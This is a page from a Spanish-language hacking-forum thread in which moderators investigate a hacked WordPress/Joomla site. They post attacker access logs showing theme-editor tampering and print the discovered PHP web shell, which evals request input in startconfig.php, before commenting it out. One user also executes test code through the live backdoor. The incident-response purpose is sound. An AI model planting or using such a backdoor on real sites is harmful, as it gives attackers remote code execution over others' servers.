elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Sigue las noticias más importantes de seguridad informática en el Twitter! de elhacker.NET


+  Foro de elhacker.net
|-+  Programación
| |-+  Desarrollo Web (Moderador: #!drvy)
| | |-+  Mi Wordpress Hackeado
0 Usuarios y 2 Visitantes están viendo este tema.
Páginas: 1 2 3 4 5 6 7 8 [9] 10 11 Ir Abajo Respuesta Imprimir
Autor Tema: Mi Wordpress Hackeado  (Leído 36,673 veces)
MinusFour
Moderador Global
***
Desconectado Desconectado

Mensajes: 5.529


I'm fourth.


Ver Perfil WWW
Re: Mi Wordpress Hackeado
« Respuesta #80 en: 25 Julio 2014, 04:24 am »

Parece que hay una variable ahí que no esta siendo limpiada, una $GET["req"]. Esas entradas simplemente están haciendo un echo, no se si alguien más haya hecho algo.

EDIT: Parece que si puedes hacer XSS por medio del primero, cuarto y quinto link.


« Última modificación: 25 Julio 2014, 04:29 am por MinusFour » En línea

ka0s


Desconectado Desconectado

Mensajes: 308


Ver Perfil
Re: Mi Wordpress Hackeado
« Respuesta #81 en: 25 Julio 2014, 04:27 am »

Parece que hay una variable ahí que no esta siendo limpiada, una $GET["req"]. Esas entradas simplemente están haciendo un echo, no se si alguien más haya hecho algo.

Veremos que dice #!drvy de eso.
Yo por lo pronto estoy intentando acceder al panel de admin de Joomla para ver que versión tiene y que cosas está usando... -_-.
Ojala podamos encontrar la vulnerabilidad que han dicho arriba


En línea

MinusFour
Moderador Global
***
Desconectado Desconectado

Mensajes: 5.529


I'm fourth.


Ver Perfil WWW
Re: Mi Wordpress Hackeado
« Respuesta #82 en: 25 Julio 2014, 04:32 am »

Veremos que dice #!drvy de eso.
Yo por lo pronto estoy intentando acceder al panel de admin de Joomla para ver que versión tiene y que cosas está usando... -_-.
Ojala podamos encontrar la vulnerabilidad que han dicho arriba

Seria muy facil subir un script ahi por medio de fopen() y luego simplemente llamarlo a ejecutar.... y puedes hacer lo que tu quieras con eso XD.
« Última modificación: 25 Julio 2014, 04:35 am por MinusFour » En línea

ka0s


Desconectado Desconectado

Mensajes: 308


Ver Perfil
Re: Mi Wordpress Hackeado
« Respuesta #83 en: 25 Julio 2014, 04:36 am »

Seria muy facil subir un script ahi por medio de file_get_contents() y luego simplemente llamarlo a ejecutar.... y puedes hacer lo que tu quieras con eso XD.

Trato de intentar entender lo que dices, pero se me complica mucho.
Como puedo corregir eso de la variable que dices?? En que archivo se encuentra?
Gracias Minus
En línea

#!drvy
Moderador
***
Desconectado Desconectado

Mensajes: 5.855



Ver Perfil WWW
Re: Mi Wordpress Hackeado
« Respuesta #84 en: 25 Julio 2014, 04:40 am »

Efectivamente, como ha mencionado @MinusFour, ese archivo ejecuta directamente el php, es vulnerable.

Lo que si he podido aislar es el ataque..

Código:
176.31.251.103 - - [06/Jul/2014:21:23:24 -0300] "GET /wp-login.php HTTP/1.1" 200 2827 "-" "Opera/9.80 (Windows NT 6.0); U) Presto/2.10.289 Version/12.02"
176.31.251.103 - - [06/Jul/2014:21:23:25 -0300] "POST /wp-login.php HTTP/1.1" 302 - "-" "Opera/9.80 (Windows NT 6.0); U) Presto/2.10.289 Version/12.02"
176.31.251.103 - - [06/Jul/2014:21:23:26 -0300] "GET /wp-admin/ HTTP/1.1" 200 69338 "-" "Opera/9.80 (Windows NT 6.0); U) Presto/2.10.289 Version/12.02"
176.31.251.103 - - [06/Jul/2014:21:23:29 -0300] "GET /wp-admin/ HTTP/1.1" 200 69338 "-" "Opera/9.80 (Windows NT 6.0); U) Presto/2.10.289 Version/12.02"
176.31.251.103 - - [06/Jul/2014:21:23:31 -0300] "GET /wp-admin/theme-editor.php HTTP/1.1" 200 33381 "-" "Opera/9.80 (Windows NT 6.0); U) Presto/2.10.289 Version/12.02"
176.31.251.103 - - [06/Jul/2014:21:23:32 -0300] "GET /wp-admin/theme-editor.php?file=404.php&theme=wilborada HTTP/1.1" 200 18746 "-" "Opera/9.80 (Windows NT 6.0); U) Presto/2.10.289 Version/12.02"
176.31.251.103 - - [06/Jul/2014:21:23:33 -0300] "POST /wp-admin/theme-editor.php HTTP/1.1" 302 - "-" "Opera/9.80 (Windows NT 6.0); U) Presto/2.10.289 Version/12.02"
176.31.251.103 - - [06/Jul/2014:21:23:34 -0300] "GET /theme-editor.php?file=404.php&theme=wilborada&scrollto=0&updated=true HTTP/1.1" 404 151 "-" "Opera/9.80 (Windows NT 6.0); U) Presto/2.10.289 Version/12.02"
176.31.251.103 - - [06/Jul/2014:21:23:35 -0300] "POST /wp-content/themes/wilborada/404.php HTTP/1.1" 200 47 "-" "Opera/9.80 (Windows NT 6.0); U) Presto/2.10.289 Version/12.02"
176.31.251.103 - - [06/Jul/2014:21:23:36 -0300] "GET /wp-content/themes/wilborada/systemcash.php HTTP/1.1" 200 120 "-" "Opera/9.80 (Windows NT 6.0); U) Presto/2.10.289 Version/12.02"
176.31.251.103 - - [06/Jul/2014:21:23:38 -0300] "POST /wp-admin/theme-editor.php HTTP/1.1" 302 - "-" "Opera/9.80 (Windows NT 6.0); U) Presto/2.10.289 Version/12.02"
176.31.251.103 - - [06/Jul/2014:21:23:39 -0300] "GET /theme-editor.php?file=404.php&theme=wilborada&scrollto=0&updated=true HTTP/1.1" 404 3 "-" "Opera/9.80 (Windows NT 6.0); U) Presto/2.10.289 Version/12.02"

El atacante obtuvo aceso logueandose, modifico el 404.php del tema, lo abrio y lo volvio a modificar. Tambien se ve el primer acceso a systemcash.php.. despues, hay entradas de bots con UA (Mozilla 3.0) que acceden a el muchisimas veces.

Todos los archivos sospechosos están borrados sin embargo (y no he sido yo) xD

Estoy mirando el archivo ese de joomla.

Saludos
En línea

MinusFour
Moderador Global
***
Desconectado Desconectado

Mensajes: 5.529


I'm fourth.


Ver Perfil WWW
Re: Mi Wordpress Hackeado
« Respuesta #85 en: 25 Julio 2014, 04:41 am »

Trato de intentar entender lo que dices, pero se me complica mucho.
Como puedo corregir eso de la variable que dices?? En que archivo se encuentra?
Gracias Minus

No se de que archivo, solo se que le estan pasando una variable GET y no están escapando los caracteres especiales, por lo que el código se ejecuta. Realmente lo único que he probado es: echo $_SERVER["SERVER_NAME"] para lo cual me trae:

Código:
www.wilboradalibros.com.ar
En línea

#!drvy
Moderador
***
Desconectado Desconectado

Mensajes: 5.855



Ver Perfil WWW
Re: Mi Wordpress Hackeado
« Respuesta #86 en: 25 Julio 2014, 04:44 am »

En el archivo litermalmente pone esto:

Código:
<?php $post_var = "req"; if(isset($_REQUEST[$post_var])) { eval(stripslashes($_REQUEST[$post_var])); exit(); }; ?>

PD: He comentado la linea.. no debería dar mas problemas.

PD2: Como sugerencia, dile a tu amiga que siempre actualice y que use una contraseña mas segura..

Saludos
« Última modificación: 25 Julio 2014, 04:47 am por #!drvy » En línea

ka0s


Desconectado Desconectado

Mensajes: 308


Ver Perfil
Re: Mi Wordpress Hackeado
« Respuesta #87 en: 25 Julio 2014, 04:49 am »

En el archivo litermalmente pone esto:

Código:
<?php $post_var = "req"; if(isset($_REQUEST[$post_var])) { eval(stripslashes($_REQUEST[$post_var])); exit(); }; ?>

PD: He comentado la linea.. no debería dar mas problemas.

Saludos

#!drvy con esto quieres que decir que está TODO SOLUCIONADO?
Me podrías decir qué linea era y de que archivo por favor así miro la línea que has comentado. Me gustaría saber que línea habia antes y compararla con la que has puesto ahora. Despues de semejante post y horas aquí, quiero seguir aprendiendo un poco.

Yo estaba tratando de acceder al Administrador de Joomla, pero no me ha pasado los datos de esa parte, solo la de Wordpress ¬¬ y quería ver que versión tenía instalada. Porque pensé que si la Wordpress tenia la versión vieja, seguramente la de Joomla también y eso repararía el error no creen?
En línea

#!drvy
Moderador
***
Desconectado Desconectado

Mensajes: 5.855



Ver Perfil WWW
Re: Mi Wordpress Hackeado
« Respuesta #88 en: 25 Julio 2014, 04:50 am »

Si se me olvido mencionarlo..

El archivo esta en

peritajedearte/plugins/editors/jckeditor/jckeditor/includes/ckeditor/autoload/startconfig.php

La linea uno contenía lo que puse en el post de arriba, y ahora tiene
Código
  1. <?php #$post_var = "req"; if(isset($_REQUEST[$post_var])) { eval(stripslashes($_REQUEST[$post_var])); exit(); }; ?>

PD: En teoria esta todo solucionado, aunque con tantas vulnerabilidades eso era un nido de malware xD

Saludos
En línea

MinusFour
Moderador Global
***
Desconectado Desconectado

Mensajes: 5.529


I'm fourth.


Ver Perfil WWW
Re: Mi Wordpress Hackeado
« Respuesta #89 en: 25 Julio 2014, 04:54 am »

¿Esa linea es innecesaria? No vay a ser que la ocupen para algo. El eval para que jodidas lo están usando directamente en una variable GET o POST, que puede ser tan importante para enviarlo así.

Por cierto, hay otras entradas que hacen lo mismo. Edit: La 4 y la 5 entrada.
« Última modificación: 25 Julio 2014, 04:55 am por MinusFour » En línea

Páginas: 1 2 3 4 5 6 7 8 [9] 10 11 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
RIN.ru Hackeado
Juegos y Consolas
::GD:: 3 3,774 Último mensaje 30 Marzo 2005, 03:57 am
por ::GD::
Ataque DDoS a WordPress : WordPress sufre el mayor ataque DDoS
Noticias
wolfbcn 0 4,614 Último mensaje 4 Marzo 2011, 13:17 pm
por wolfbcn
Me han hackeado
Seguridad
###almohadilla 1 2,688 Último mensaje 4 Abril 2014, 09:50 am
por dRak0
[WordPress] ¿ Cómo añadir una entrada en WordPress 3.8.2 ?
Desarrollo Web
0x5d 3 5,141 Último mensaje 12 Abril 2014, 06:47 am
por 0x5d
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines